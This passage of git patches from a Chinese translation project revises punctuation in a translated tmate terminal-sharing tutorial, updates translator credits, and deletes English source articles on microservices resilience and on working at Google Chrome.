+![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) -### How to connect session through Web URL +### 如何通过 Web URL 连接会话 -Open the browser and access the URL which you got from your friend. It's -like similar to below.\ -[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) +打开浏览器然后访问朋友给你的 URL 就行了. 像下面这样. +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) -Just type `exit` to exit from the session. +只需要输入 `exit` 就能退出会话了. ``` [Source System Output] From 377921624b9e6869d583a5950141ce187b900b87 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Wed, 29 Nov 2017 11:50:56 -0500 Subject: [PATCH 0074/1627] cancel request --- ...170809 Designing a Microservices Architecture for Failure.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md b/sources/tech/20170809 Designing a Microservices Architecture for Failure.md index 3325aaf8da..e1124c229c 100644 --- a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md +++ b/sources/tech/20170809 Designing a Microservices Architecture for Failure.md @@ -1,5 +1,3 @@ -yixunx翻译中 - Designing a Microservices Architecture for Failure ============================================================  From c8c90fbd44f2899f39b3aa7e337a268effb70c48 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 30 Nov 2017 00:55:31 +0800 Subject: [PATCH 0075/1627] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=87=E7=82=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...our Terminal Session To Anyone In Seconds.md | 76 +++++++++---------- 1 file changed, 38 insertions(+), 38 deletions(-) diff --git a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md index 2f6d6fe3c7..2c9bde95aa 100644 --- a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md +++ b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md @@ -3,37 +3,37 @@ tmate -- 秒级分享你的终端会话 不久前,我们写过一篇关于 [teleconsole](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/) 的介绍,该工具可用于快速分享终端给任何人(任何你信任的人)。今天我们要聊一聊另一款类似的应用,名叫 `tmate`。 -`tmate` 有什么用? 它可以让你在需要帮助时向你的朋友们求助。 +`tmate` 有什么用?它可以让你在需要帮助时向你的朋友们求助。 -### 什么是 tmate? +### 什么是 tmate? -[tmate](https://tmate.io/) 的意思是 `teammates`, 它是 tmux 的一个分支,并且使用相同的配置信息(例如快捷键配置,配色方案等). -它是一个终端多路复用器,同时具有即时分享终端的能力。它允许在单个屏幕中创建并操控多个终端,同时这些终端还能与其他同事分享。 +[tmate](https://tmate.io/) 的意思是 `teammates`,它是 tmux 的一个分支,并且使用相同的配置信息(例如快捷键配置,配色方案等)。 +它是一个终端多路复用器,同时具有即时分享终端的能力。它允许在单个屏幕中创建并操控多个终端,同时这些终端还能与其他同事分享。 -你可以分离会话,让作业在后台运行,然后在想要查看状态时重新连接会话. `tmate` 提供了一个即时配对的方案, 让你可以与一个或多个队友共享一个终端. +你可以分离会话,让作业在后台运行,然后在想要查看状态时重新连接会话. `tmate` 提供了一个即时配对的方案,让你可以与一个或多个队友共享一个终端。 -在屏幕的地步有一个状态栏,显示了当前会话的一些诸如 ssh 命令之类的共享信息. +在屏幕的地步有一个状态栏,显示了当前会话的一些诸如 ssh 命令之类的共享信息。 -### tmate 是怎么工作的? +### tmate 是怎么工作的? -- 运行 `tmate` 时, 会通过 `libssh` 在后台创建一个连接到 tmate.io (由 tmate 开发者维护的后台服务器)的ssh 连接. -- 服务器 (tmate.io) 的 ssh 密钥前面通过 DH 交换进行校验. -- 客户端通过本地 ssh 密钥进行认证. -- 连接创建后, 本地 tmux 服务器会生成一个 150 位(不可猜测的随机字符)会话令牌. -- 队友能通过用户提供的 SSH 会话 ID 连接到 tmate.io. +- 运行 `tmate` 时,会通过 `libssh` 在后台创建一个连接到 tmate.io (由 tmate 开发者维护的后台服务器)的ssh 连接。 +- 服务器 (tmate.io) 的 ssh 密钥前面通过 DH 交换进行校验。 +- 客户端通过本地 ssh 密钥进行认证。 +- 连接创建后,本地 tmux 服务器会生成一个 150 位(不可猜测的随机字符)会话令牌。 +- 队友能通过用户提供的 SSH 会话 ID 连接到 tmate.io。 ### 使用 tmate 的必备条件 -由于 `tmate.io` 服务器需要通过本地 ssh 密钥来认证客户机,因此其中一个必备条件就是生成 SSH 密钥 key. -记住, 每个系统都要有自己的 SSH 密钥. +由于 `tmate.io` 服务器需要通过本地 ssh 密钥来认证客户机,因此其中一个必备条件就是生成 SSH 密钥 key。 +记住,每个系统都要有自己的 SSH 密钥。 ```shell $ ssh-keygen -t rsa -Generating public/private rsa key pair. +Generating public/private rsa key pair。 Enter file in which to save the key (/home/magi/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: -Your identification has been saved in /home/magi/.ssh/id_rsa. -Your public key has been saved in /home/magi/.ssh/id_rsa.pub. +Your identification has been saved in /home/magi/.ssh/id_rsa。 +Your public key has been saved in /home/magi/.ssh/id_rsa.pub。 The key fingerprint is: SHA256:3ima5FuwKbWyyyNrlR/DeBucoyRfdOtlUmb5D214NC8 [email protected] The key's randomart image is: @@ -42,7 +42,7 @@ The key's randomart image is: | | | . | | . . = o | -| *ooS= . + o | +| *ooS= 。 o | | . [email protected]*o.o.+ E .| | =o==B++o = . | | o.+*o+.. . | @@ -52,10 +52,10 @@ The key's randomart image is: ### 如何安装 tmate -`tmate` 已经包含在某些发行版的官方仓库中,可以通过包管理器来安装. +`tmate` 已经包含在某些发行版的官方仓库中,可以通过包管理器来安装。 -对于 **`Debian/Ubuntu`**, 可以使用 [APT-GET 命令](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) -或者 [APT 命令](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to 来安装. +对于 **`Debian/Ubuntu`**,可以使用 [APT-GET 命令](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) +或者 [APT 命令](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to 来安装。 ```shell $ sudo apt-get install software-properties-common @@ -64,20 +64,20 @@ $ sudo apt-get update $ sudo apt-get install tmate ``` -你也可以从官方仓库中安装 tmate. +你也可以从官方仓库中安装 tmate。 ```shell $ sudo apt-get install tmate ``` -对于 **`Fedora`**, 使用 [DNF 命令](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) 来安装. +对于 **`Fedora`**,使用 [DNF 命令](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) 来安装。 ```shell $ sudo dnf install tmate ``` -对于基于 **`Arch Linux`** 的系统, 使用 []()[Yaourt 命令](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) -或 []()[Packer 命令](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) 来从 AUR 仓库中安装. +对于基于 **`Arch Linux`** 的系统,使用 []()[Yaourt 命令](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) +或 []()[Packer 命令](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) 来从 AUR 仓库中安装。 ```shell $ yaourt -S tmate @@ -88,7 +88,7 @@ $ yaourt -S tmate $ packer -S tmate ``` -对于 **`openSUSE`**, 使用 [Zypper 命令](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) 来安装. +对于 **`openSUSE`**,使用 [Zypper 命令](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) 来安装。 ```shell $ sudo zypper in tmate @@ -96,24 +96,24 @@ $ sudo zypper in tmate ### 如何使用 tmate -成功安装后, 打开终端然后输入下面命令,就会打开一个新的会话,在屏幕底部,你能看到 SSH 会话的 ID. +成功安装后,打开终端然后输入下面命令,就会打开一个新的会话,在屏幕底部,你能看到 SSH 会话的 ID。 ```shell $ tmate ``` -![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) -要注意的是, SSH 会话 ID 会在几秒后消失, 不过不要紧,你可以通过下面命令获取到这些详细信息. +要注意的是,SSH 会话 ID 会在几秒后消失,不过不要紧,你可以通过下面命令获取到这些详细信息。 ```shell $ tmate show-messages ``` -`tmate` 的 `show-messages` 命令会显示 tmate 的 log 信息,其中包含了 ssh 连接内容。 -![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) +`tmate` 的 `show-messages` 命令会显示 tmate 的 log 信息,其中包含了 ssh 连接内容。 +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) -现在, 分享你的 SSH 会话 ID 给你的朋友或同事从而允许他们观看终端会话. 除了 SSH 会话 ID 以外,你也可以分享 web URL。 +现在,分享你的 SSH 会话 ID 给你的朋友或同事从而允许他们观看终端会话. 除了 SSH 会话 ID 以外,你也可以分享 web URL。 另外你还可以选择分享的是只读会话还是可读写会话。 ### 如何通过 SSH 连接会话 @@ -124,15 +124,15 @@ $ tmate show-messages $ ssh session: ssh 3KuRj95sEZRHkpPtc2y6jcokP@sg2.tmate.io ``` -![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) ### 如何通过 Web URL 连接会话 -打开浏览器然后访问朋友给你的 URL 就行了. 像下面这样. -![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) +打开浏览器然后访问朋友给你的 URL 就行了. 像下面这样。 +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) -只需要输入 `exit` 就能退出会话了. +只需要输入 `exit` 就能退出会话了。 ``` [Source System Output] @@ -140,8 +140,8 @@ $ ssh session: ssh 3KuRj95sEZRHkpPtc2y6jcokP@sg2.tmate.io [Remote System Output] [server exited] -Connection to sg2.tmate.io closed by remote host. -Connection to sg2.tmate.io closed. +Connection to sg2.tmate.io closed by remote host。 +Connection to sg2.tmate.io closed。 ``` -------------------------------------------------------------------------------- From a09bf08dc0ffc95921809d90325c004e89a4358d Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 30 Nov 2017 01:03:51 +0800 Subject: [PATCH 0076/1627] =?UTF-8?q?=E6=9B=B4=E6=94=B9=E7=9B=AE=E5=BD=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Instantly Share Your Terminal Session To Anyone In Seconds.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md (100%) diff --git a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md similarity index 100% rename from sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md rename to translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md From e9a0ae4b402c4eeab109ebc487cb9d0800a8aa9d Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 30 Nov 2017 01:11:52 +0800 Subject: [PATCH 0077/1627] =?UTF-8?q?update=20=E8=AF=91=E8=80=85=E4=BF=A1?= =?UTF-8?q?=E6=81=AF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Instantly Share Your Terminal Session To Anyone In Seconds.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md index 2c9bde95aa..16b239f0c8 100644 --- a/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md +++ b/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md @@ -149,7 +149,7 @@ Connection to sg2.tmate.io closed。 via: https://www.2daygeek.com/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds/ 作者:[ Magesh Maruthamuthu ][a] -译者:[译者ID](https://github.com/译者ID) +译者:[lujun9972](https://github.com/lujun9972) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 16b3c6ab24fae8a34e051f29d3b01043035f9067 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 30 Nov 2017 08:15:08 +0800 Subject: [PATCH 0078/1627] =?UTF-8?q?=E5=88=A0=E9=99=A4=EF=BC=8C=E5=B7=B2?= =?UTF-8?q?=E6=9C=89=E8=AF=91=E6=96=87?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Microservices Architecture for Failure.md | 213 ------------------ 1 file changed, 213 deletions(-) delete mode 100644 sources/tech/20170809 Designing a Microservices Architecture for Failure.md diff --git a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md b/sources/tech/20170809 Designing a Microservices Architecture for Failure.md deleted file mode 100644 index e1124c229c..0000000000 --- a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md +++ /dev/null @@ -1,213 +0,0 @@ -Designing a Microservices Architecture for Failure -============================================================  - - -A Microservices architecture makes it possible to **isolate failures**through well-defined service boundaries. But like in every distributed system, there is a **higher chance** for network, hardware or application level issues. As a consequence of service dependencies, any component can be temporarily unavailable for their consumers. To minimize the impact of partial outages we need to build fault tolerant services that can **gracefully** respond to certain types of outages. - -This article introduces the most common techniques and architecture patterns to build and operate a **highly available microservices** system based on [RisingStack’s Node.js Consulting & Development experience][3]. - - _If you are not familiar with the patterns in this article, it doesn’t necessarily mean that you do something wrong. Building a reliable system always comes with an extra cost._ - -### The Risk of the Microservices Architecture - -The microservices architecture moves application logic to services and uses a network layer to communicate between them. Communicating over a network instead of in-memory calls brings extra latency and complexity to the system which requires cooperation between multiple physical and logical components. The increased complexity of the distributed system leads to a higher chance of particular **network failures**. - -One of the biggest advantage of a microservices architecture over a monolithic one is that teams can independently design, develop and deploy their services. They have full ownership over their service's lifecycle. It also means that teams have no control over their service dependencies as it's more likely managed by a different team. With a microservices architecture, we need to keep in mind that provider **services can be temporarily unavailable** by broken releases, configurations, and other changes as they are controlled by someone else and components move independently from each other. - -### Graceful Service Degradation - -One of the best advantages of a microservices architecture is that you can isolate failures and achieve graceful service degradation as components fail separately. For example, during an outage customers in a photo sharing application maybe cannot upload a new picture, but they can still browse, edit and share their existing photos. - -![Microservices fail separately in theory](https://blog-assets.risingstack.com/2017/08/microservices-fail-separately-in-theory.png) - - _Microservices fail separately (in theory)_ - -In most of the cases, it's hard to implement this kind of graceful service degradation as applications in a distributed system depend on each other, and you need to apply several failover logics  _(some of them will be covered by this article later)_  to prepare for temporary glitches and outages. - -![Microservices Depend on Each Other](https://blog-assets.risingstack.com/2017/08/Microservices-depend-on-each-other.png) - - _Services depend on each other and fail together without failover logics._ - -### Change management - -Google’s site reliability team has found that roughly **70% of the outages are caused by changes** in a live system. When you change something in your service - you deploy a new version of your code or change some configuration - there is always a chance for failure or the introduction of a new bug. - -In a microservices architecture, services depend on each other. This is why you should minimize failures and limit their negative effect. To deal with issues from changes, you can implement change management strategies and **automatic rollouts**. - -For example, when you deploy new code, or you change some configuration, you should apply these changes to a subset of your instances gradually, monitor them and even automatically revert the deployment if you see that it has a negative effect on your key metrics. - -![Microservices Change Management](https://blog-assets.risingstack.com/2017/08/microservices-change-management.png) - - _Change Management - Rolling Deployment_ - -Another solution could be that you run two production environments. You always deploy to only one of them, and you only point your load balancer to the new one after you verified that the new version works as it is expected. This is called blue-green, or red-black deployment. - -**Reverting code is not a bad thing.** You shouldn’t leave broken code in production and then think about what went wrong. Always revert your changes when it’s necessary. The sooner the better. - -#### Want to learn more about building reliable mircoservices architectures? - -##### Check out our upcoming trainings! - -[MICROSERVICES TRAININGS ][4] - -### Health-check and Load Balancing - -Instances continuously start, restart and stop because of failures, deployments or autoscaling. It makes them temporarily or permanently unavailable. To avoid issues, your load balancer should **skip unhealthy instances** from the routing as they cannot serve your customers' or sub-systems' need. - -Application instance health can be determined via external observation. You can do it with repeatedly calling a `GET /health`endpoint or via self-reporting. Modern **service discovery** solutions continuously collect health information from instances and configure the load-balancer to route traffic only to healthy components. - -### Self-healing - -Self-healing can help to recover an application. We can talk about self-healing when an application can **do the necessary steps** to recover from a broken state. In most of the cases, it is implemented by an external system that watches the instances health and restarts them when they are in a broken state for a longer period. Self-healing can be very useful in most of the cases, however, in certain situations it **can cause trouble** by continuously restarting the application. This might happen when your application cannot give positive health status because it is overloaded or its database connection times out. - -Implementing an advanced self-healing solution which is prepared for a delicate situation - like a lost database connection - can be tricky. In this case, you need to add extra logic to your application to handle edge cases and let the external system know that the instance is not needed to restart immediately. - -### Failover Caching - -Services usually fail because of network issues and changes in our system. However, most of these outages are temporary thanks to self-healing and advanced load-balancing we should find a solution to make our service work during these glitches. This is where **failover caching** can help and provide the necessary data to our application. - -Failover caches usually use **two different expiration dates**; a shorter that tells how long you can use the cache in a normal situation, and a longer one that says how long can you use the cached data during failure. - -![Microservices Failover Caching](https://blog-assets.risingstack.com/2017/08/microservices-failover-caching.png) - - _Failover Caching_ - -It’s important to mention that you can only use failover caching when it serves **the outdated data better than nothing**. - -To set cache and failover cache, you can use standard response headers in HTTP. - -For example, with the `max-age` header you can specify the maximum amount of time a resource will be considered fresh. With the `stale-if-error` header, you can determine how long should the resource be served from a cache in the case of a failure. - -Modern CDNs and load balancers provide various caching and failover behaviors, but you can also create a shared library for your company that contains standard reliability solutions. - -### Retry Logic - -There are certain situations when we cannot cache our data or we want to make changes to it, but our operations eventually fail. In these cases, we can **retry our action** as we can expect that the resource will recover after some time or our load-balancer sends our request to a healthy instance. - -You should be careful with adding retry logic to your applications and clients, as a larger amount of **retries can make things even worse** or even prevent the application from recovering. - -In distributed system, a microservices system retry can trigger multiple other requests or retries and start a **cascading effect**. To minimize the impact of retries, you should limit the number of them and use an exponential backoff algorithm to continually increase the delay between retries until you reach the maximum limit. - -As a retry is initiated by the client  _(browser, other microservices, etc.)_ and the client doesn't know that the operation failed before or after handling the request, you should prepare your application to handle **idempotency**. For example, when you retry a purchase operation, you shouldn't double charge the customer. Using a unique **idempotency-key** for each of your transactions can help to handle retries. - -### Rate Limiters and Load Shedders - -Rate limiting is the technique of defining how many requests can be received or processed by a particular customer or application during a timeframe. With rate limiting, for example, you can filter out customers and microservices who are responsible for **traffic peaks**, or you can ensure that your application doesn’t overload until autoscaling can’t come to rescue. - -You can also hold back lower-priority traffic to give enough resources to critical transactions. - -![Microservices Rate Limiter](https://blog-assets.risingstack.com/2017/08/microservices-rate-limiter.png) - - _A rate limiter can hold back traffic peaks_ - -A different type of rate limiter is called the  _concurrent request limiter_ . It can be useful when you have expensive endpoints that shouldn’t be called more than a specified times, while you still want to serve traffic. - -A  _fleet usage load shedder_  can ensure that there are always enough resources available to **serve critical transactions**. It keeps some resources for high priority requests and doesn’t allow for low priority transactions to use all of them. A load shedder makes its decisions based on the whole state of the system, rather than based on a single user’s request bucket size. Load shedders **help your system to recover**, since they keep the core functionalities working while you have an ongoing incident. - -To read more about rate limiters and load shredders, I recommend checking out [Stripe’s article][5]. - -### Fail Fast and Independently - -In a microservices architecture we want to prepare our services **to fail fast and separately**. To isolate issues on service level, we can use the  _bulkhead pattern_ . You can read more about bulkheads later in this blog post. - -We also want our components to **fail fast** as we don't want to wait for broken instances until they timeout. Nothing is more disappointing than a hanging request and an unresponsive UI. It's not just wasting resources but also screwing up the user experience. Our services are calling each other in a chain, so we should pay an extra attention to prevent hanging operations before these delays sum up. - -The first idea that would come to your mind would be applying fine grade timeouts for each service calls. The problem with this approach is that you cannot really know what's a good timeout value as there are certain situations when network glitches and other issues happen that only affect one-two operations. In this case, you probably don’t want to reject those requests if there’s only a few of them timeouts. - -We can say that achieving the fail fast paradigm in microservices by **using timeouts is an anti-pattern** and you should avoid it. Instead of timeouts, you can apply the  _circuit-breaker_  pattern that depends on the success / fail statistics of operations. - -#### Want to learn more about building reliable mircoservices architectures? - -##### Check out our upcoming trainings! - -[MICROSERVICES TRAININGS ][6] - -### Bulkheads - -Bulkhead is used in the industry to **partition** a ship **into sections**, so that sections can be sealed off if there is a hull breach. - -The concept of bulkheads can be applied in software development to **segregate resources**. - -By applying the bulkheads pattern, we can **protect limited resources** from being exhausted. For example, we can use two connection pools instead of a shared on if we have two kinds of operations that communicate with the same database instance where we have limited number of connections. As a result of this client - resource separation, the operation that timeouts or overuses the pool won't bring all of the other operations down. - -One of the main reasons why Titanic sunk was that its bulkheads had a design failure, and the water could pour over the top of the bulkheads via the deck above and flood the entire hull. - -![Titanic Microservices Bulkheads](https://blog-assets.risingstack.com/2017/08/titanic-bulkhead-microservices.png) - - _Bulkheads in Titanic (they didn't work)_ - -### Circuit Breakers - -To limit the duration of operations, we can use timeouts. Timeouts can prevent hanging operations and keep the system responsive. However, using static, fine tuned timeouts in microservices communication is an **anti-pattern** as we’re in a highly dynamic environment where it's almost impossible to come up with the right timing limitations that work well in every case. - -Instead of using small and transaction-specific static timeouts, we can use circuit breakers to deal with errors. Circuit breakers are named after the real world electronic component because their behavior is identical. You can **protect resources** and **help them to recover** with circuit breakers. They can be very useful in a distributed system where a repetitive failure can lead to a snowball effect and bring the whole system down. - -A circuit breaker opens when a particular type of **error occurs multiple times** in a short period. An open circuit breaker prevents further requests to be made - like the real one prevents electrons from flowing. Circuit breakers usually close after a certain amount of time, giving enough space for underlying services to recover. - -Keep in mind that not all errors should trigger a circuit breaker. For example, you probably want to skip client side issues like requests with `4xx` response codes, but include `5xx` server-side failures. Some circuit breakers can have a half-open state as well. In this state, the service sends the first request to check system availability, while letting the other requests to fail. If this first request succeeds, it restores the circuit breaker to a closed state and lets the traffic flow. Otherwise, it keeps it open. - -![Microservices Circuit Breakers](https://blog-assets.risingstack.com/2017/08/microservices-circuit-breakers.png) - - _Circuit Breaker_ - -### Testing for Failures - -You should continually **test your system against common issues** to make sure that your services can **survive various failures**. You should test for failures frequently to keep your team prepared for incidents. - -For testing, you can use an external service that identifies groups of instances and randomly terminates one of the instances in this group. With this, you can prepare for a single instance failure, but you can even shut down entire regions to simulate a cloud provider outage. - -One of the most popular testing solutions is the [ChaosMonkey][7]resiliency tool by Netflix. - -### Outro - -Implementing and running a reliable service is not easy. It takes a lot of effort from your side and also costs money to your company. - -Reliability has many levels and aspects, so it is important to find the best solution for your team. You should make reliability a factor in your business decision processes and allocate enough budget and time for it. - -### Key Takeways - -* Dynamic environments and distributed systems - like microservices - lead to a higher chance of failures. - -* Services should fail separately, achieve graceful degradation to improve user experience. - -* 70% of the outages are caused by changes, reverting code is not a bad thing. - -* Fail fast and independently. Teams have no control over their service dependencies. - -* Architectural patterns and techniques like caching, bulkheads, circuit breakers and rate-limiters help to build reliable microservices. - -To learn more about running a reliable service check out our free [Node.js Monitoring, Alerting & Reliability 101 e-book][8]. In case you need help with implementing a microservices system, reach out to us at [@RisingStack][9] on Twitter, or enroll in our upcoming [Building Microservices with Node.js][10]. - - -------------- - -作者简介 - -[Péter Márton][2] - -CTO at RisingStack, microservices and brewing beer with Node.js - -[https://twitter.com/slashdotpeter][1] - --------------------------------------------------------------------------------- - -via: https://blog.risingstack.com/designing-microservices-architecture-for-failure/ - -作者:[ Péter Márton][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.risingstack.com/author/peter-marton/ -[1]:https://twitter.com/slashdotpeter -[2]:https://blog.risingstack.com/author/peter-marton/ -[3]:https://risingstack.com/ -[4]:https://blog.risingstack.com/training-building-microservices-node-js/?utm_source=rsblog&utm_medium=roadblock-new&utm_content=/designing-microservices-architecture-for-failure/ -[5]:https://stripe.com/blog/rate-limiters -[6]:https://blog.risingstack.com/training-building-microservices-node-js/?utm_source=rsblog&utm_medium=roadblock-new -[7]:https://github.com/Netflix/chaosmonkey -[8]:https://trace.risingstack.com/monitoring-ebook -[9]:https://twitter.com/RisingStack -[10]:https://blog.risingstack.com/training-building-microservices-node-js/ -[11]:https://blog.risingstack.com/author/peter-marton/ From 6935eca303bd177890f54defbb484c5c98d652a1 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 30 Nov 2017 08:17:28 +0800 Subject: [PATCH 0079/1627] =?UTF-8?q?=E5=88=A0=E9=99=A4=EF=BC=8C=E8=BF=87?= =?UTF-8?q?=E6=97=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20170201 GOOGLE CHROME–ONE YEAR IN.md | 290 ------------------ 1 file changed, 290 deletions(-) delete mode 100644 sources/talk/20170201 GOOGLE CHROME–ONE YEAR IN.md diff --git a/sources/talk/20170201 GOOGLE CHROME–ONE YEAR IN.md b/sources/talk/20170201 GOOGLE CHROME–ONE YEAR IN.md deleted file mode 100644 index 3a567251da..0000000000 --- a/sources/talk/20170201 GOOGLE CHROME–ONE YEAR IN.md +++ /dev/null @@ -1,290 +0,0 @@ -GOOGLE CHROME–ONE YEAR IN -======================================== - - -Four weeks ago, emailed notice of a free massage credit revealed that I’ve been at Google for a year. Time flies when you’re [drinking from a firehose][3]. - -When I mentioned my anniversary, friends and colleagues from other companies asked what I’ve learned while working on Chrome over the last year. This rambling post is an attempt to answer that question. - -### NON-MASKABLE INTERRUPTS - -While I _started_ at Google just over a year ago, I haven’t actually _worked_ there for a full year yet. My second son (Nate) was born a few weeks early, arriving ten workdays after my first day of work. - -I took full advantage of Google’s very generous twelve weeks of paternity leave, taking a few weeks after we brought Nate home, and the balance as spring turned to summer. In a year, we went from having an enormous infant to an enormous toddler who’s taking his first steps and trying to emulate everything his 3 year-old brother (Noah) does. - - ![Baby at the hospital](https://textplain.files.wordpress.com/2017/01/image55.png?w=318&h=468 "New Release") - - ![First birthday cake](https://textplain.files.wordpress.com/2017/01/image56.png?w=484&h=466) - -I mention this because it’s had a huge impact on my work over the last year—_much_ more than I’d naively expected. - -When Noah was born, I’d been at Telerik for [almost a year][4], and I’d been hacking on Fiddler alone for nearly a decade. I took a short paternity leave, and my coding hours shifted somewhat (I started writing code late at night between bottle feeds), but otherwise my work wasn’t significantly impacted. - -As I pondered joining Google Chrome’s security team, I expected pretty much the same—a bit less sleep, a bit of scheduling awkwardness, but I figured things would fall into a good routine in a few months. - -Things turned out somewhat differently. - -Perhaps sensing that my life had become too easy, fate decided that 2016 was the year I’d get sick. _Constantly_. (Our theory is that Noah was bringing home germs from pre-school; he got sick a bunch too, but recovered quickly each time.) I was sick more days in 2016 than I was in the prior decade, including a month-long illness in the spring. _That_ ended with a bout of pneumonia that concluded with a doctor-mandated seven days away from the office. As I coughed my brains out on the sofa at home, I derived some consolation in thinking about Google’s generous life insurance package. But for the most part, my illnesses were minor—enough to keep me awake at night and coughing all day, but otherwise able to work. - -Mathematically, you might expect two kids to be twice as much work as one, but in our experience, it hasn’t worked out that way. Instead, it varies between 80% (when the kids happily play together) to 400% (when they’re colliding like atoms in a runaway nuclear reactor). Thanks to my wife’s heroic efforts, we found a workable _daytime _routine. The nights, however, have been unexpectedly difficult. Big brother Noah is at an age where he usually sleeps through the night, but he’s sure to wake me up every morning at 6:30am sharp. Fortunately, Nate has been a pretty good sleeper, but even now, at just over a year old, he usually still wakes up and requires attention twice a night or so. - -I can’t_ remember _the last time I had eight hours of sleep in a row. And that’s been _extremely _challenging… because I can’t remember _much else_ either. Learning new things when you don’t remember them the next day is a brutal, frustrating process. - -When Noah was a baby, I could simply sleep in after a long night. Even if I didn’t get enough sleep, it wouldn’t really matter—I’d been coding in C# on Fiddler for a decade, and deadlines were few and far between. If all else failed, I’d just avoid working on any especially gnarly code and spend the day handling support requests, updating graphics, or doing other simple and straightforward grunt work from my backlog. - -Things are much different on Chrome. - -### ROLES - -When I first started talking to the Chrome Security team about coming aboard, it was for a role on the Developer Advocacy team. I’d be driving HTTPS adoption across the web and working with big sites to unblock their migrations in any way I could. I’d already been doing the first half of that for fun (delivering [talks][5] at conferences like Codemash and [Velocity][6]), and I’d previously spent eight years as a Security Program Manager for the Internet Explorer team. I had _tons _of relevant experience. Easy peasy. - -I interviewed for the Developer Advocate role. The hiring committee kicked back my packet and said I should interview as a Technical Program Manager instead. - -I interviewed as a Technical Program Manager. The hiring committee kicked back my packet and said I should interview as a Developer Advocate instead. - -The Chrome team resolved the deadlock by hiring me as a Senior Software Engineer (SWE). - -I was initially _very _nervous about this, having not written any significant C++ code in over a decade—except for one [in-place replacement][7] of IE9’s caching logic which I’d coded as a PM because I couldn’t find a developer to do the work. But eventually I started believing in my own pep talk: _“I mean, how hard could it be, right? I’ve been troubleshooting code in web browsers for almost two decades now. I’m not a 